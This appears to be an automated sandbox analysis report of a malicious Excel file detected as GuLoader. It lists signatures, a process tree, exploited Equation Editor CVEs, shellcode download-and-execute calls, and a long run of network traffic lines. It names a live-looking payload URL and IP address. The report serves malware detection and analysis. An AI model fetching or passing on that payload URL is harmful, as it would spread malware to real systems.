Edit tour

Windows Analysis Report
#U4e5d#U6708#U58f0#U660e_40981677.xls

Overview

General Information

Sample Name:	#U4e5d#U6708#U58f0#U660e_40981677.xls
Original Sample Name:	_40981677.xls
Analysis ID:	1326245
MD5:	c1a75affe1c99a629a5fb4b3df7359e9
SHA1:	86e4a29c68354c25cda769698fdd189e9f2f14b1
SHA256:	649e9cc1261032e6098f6469b87a16e4342c159b29725af71afeb71183513aad
Tags:	xls
Infos:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Antivirus / Scanner detection for submitted sample

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Yara detected GuLoader

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Shellcode detected

Excel sheet contains many unusual embedded objects

Office equation editor drops PE file

Tries to detect virtualization through RDTSC time measurements

Office equation editor establishes network connection

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Stores files to the Windows start menu directory

Contains functionality to dynamically determine API calls

Downloads executable code via HTTP

Document misses a certain OLE stream usually present in this Microsoft Office document type

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Contains functionality to download and execute PE files

Office Equation Editor has been started

Contains functionality to download and launch executables

Document contains embedded VBA macros

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 1996 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

EQNEDT32.EXE (PID: 1720 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

audiodgse.exe (PID: 2880 cmdline: "C:\Users\user\AppData\Roaming\audiodgse.exe" MD5: 6E8215EEE3034D6DCF18D79D397E5715)

AcroRd32.exe (PID: 2456 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding MD5: 2F8D93826B8CBF9290BC57535C7A6817)

RdrCEF.exe (PID: 3708 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043 MD5: 326A645391A97C760B60C558A35BB068)

EQNEDT32.EXE (PID: 3596 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

audiodgse.exe (PID: 2128 cmdline: "C:\Users\user\AppData\Roaming\audiodgse.exe" MD5: 6E8215EEE3034D6DCF18D79D397E5715)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/ https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware-to-advanced-social-engineering/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.1051412581.00000000087F3000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Signatures

Exploits

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1720, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\smss[1].exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: #U4e5d#U6708#U58f0#U660e_40981677.xls	ReversingLabs: Detection: 34%
Source: #U4e5d#U6708#U58f0#U660e_40981677.xls	Virustotal: Detection: 48%			Perma Link

Antivirus / Scanner detection for submitted sample

Source: #U4e5d#U6708#U58f0#U660e_40981677.xls

Avira: detected

Antivirus detection for URL or domain

Source: http://103.72.68.128/S1510M/smss.exej	Avira URL Cloud: Label: malware
Source: http://103.72.68.128/S1510M/smss.exe	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: http://103.72.68.128/S1510M/smss.exej	Virustotal: Detection: 11%			Perma Link
Source: http://103.72.68.128/S1510M/smss.exe	Virustotal: Detection: 11%			Perma Link

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\audiodgse.exe	Avira: detection malicious, Label: HEUR/AGEN.1331786
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\smss[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1331786

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\smss[1].exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\smss[1].exe	Virustotal: Detection: 31%	Perma Link
Source: C:\Users\user\AppData\Roaming\audiodgse.exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Roaming\audiodgse.exe	Virustotal: Detection: 31%	Perma Link

Exploits

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\audiodgse.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\audiodgse.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\audiodgse.exe	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\audiodgse.exe	Jump to behavior

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 103.72.68.128 Port: 80

Jump to behavior

Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: C:\Users\user\AppData\Roaming\audiodgse.exe	Code function: 5_2_004062DD FindFirstFileA,FindClose,	5_2_004062DD
Source: C:\Users\user\AppData\Roaming\audiodgse.exe	Code function: 5_2_004057A2 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	5_2_004057A2
Source: C:\Users\user\AppData\Roaming\audiodgse.exe	Code function: 5_2_00402765 FindFirstFileA,	5_2_00402765

Software Vulnerabilities

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035303C0 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_035303C0
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03530435 URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_03530435
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03530463 ShellExecuteW,ExitProcess,	2_2_03530463
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035303DA URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_035303DA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03530342 URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_03530342
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03530488 ExitProcess,	2_2_03530488
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0353044E ShellExecuteW,ExitProcess,	2_2_0353044E
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0353030D ExitProcess,	2_2_0353030D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 9_2_035F03C0 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,	9_2_035F03C0
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 9_2_035F0435 URLDownloadToFileW,ShellExecuteW,ExitProcess,	9_2_035F0435
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 9_2_035F0463 ShellExecuteW,ExitProcess,	9_2_035F0463
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 9_2_035F03DA URLDownloadToFileW,ShellExecuteW,ExitProcess,	9_2_035F03DA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 9_2_035F044E ShellExecuteW,ExitProcess,	9_2_035F044E
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 9_2_035F030D ExitProcess,	9_2_035F030D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 9_2_035F0488 ExitProcess,	9_2_035F0488
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 9_2_035F0342 URLDownloadToFileW,ShellExecuteW,ExitProcess,	9_2_035F0342

Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
